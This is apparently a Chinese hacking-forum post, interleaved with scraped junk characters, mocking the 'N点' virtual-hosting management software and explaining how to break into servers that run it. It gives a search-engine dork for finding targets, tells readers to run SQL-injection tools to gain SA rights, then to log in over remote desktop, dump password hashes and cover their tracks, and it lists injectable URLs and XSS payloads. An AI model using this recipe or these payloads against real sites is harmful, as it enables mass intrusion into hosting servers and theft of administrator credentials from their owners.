不得不说N点实在是一个破东西5 {5 r5 v k6 h. ^& x
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
A& l. k# }# g3 i0 b' ]/ r2 o# P x好吧 抱怨一下就行了 接下来关键的时候到了" Z& H" l2 Q% k+ A [% M
首先百度搜索关键字:inurl: (mmdatabase.asp)
& u& a }% f. d% o: S: H, m6 _我随便列举一个: www.xxxx.com
9 x3 y! R6 e1 Z& X" e' |修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
d( U7 |9 v) M: ~扔入NBSI 或者啊D等各种傻逼工具后
* J% N& Q( W4 T' q3 ~你们会看到是SA权限
" v" _3 W3 T% }9 y果断3389 上去 hash得到administrator密码
4 x2 y& ^3 H7 `7 c) u) ~擦屁股走人~/ w9 ^, q. Q5 j6 @! x. l
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
' m7 J* x6 n# Y/ q8 G. V e" Z& h. ]
# g( N# ~8 ?# }再附上其他几个漏洞页面
# z V5 e: A4 B. f4 VSQL:
3 ^7 @# ]& H5 D5 k( z+ Z. y9 u `: nhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
2 O: _+ N5 s, S0 v. S* C& Ahttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
: ?" W! h* m6 ]% L0 thttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
M2 s9 J% ?( e8 L" Bhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
) c& u6 [6 r3 p# N* R6 Y. D9 yXSS证明:/ P& F5 o7 X o( Y% e+ {
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
7 |8 i4 o# t' K: {http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”& \6 s$ a$ R7 V' f' G; k3 S8 ~) @
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>/ B) `0 i- d9 r8 s* `( V
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜% Q2 `/ F, k. v ]. G
还是星外吧 你们懂的
/ o( g$ _. v: `: s# A; ~& D2 d作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
+ L, Z7 B5 ?- O% i I( o' g1 v+ [PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉+ }9 g$ j* ~, g, Z ^
——- |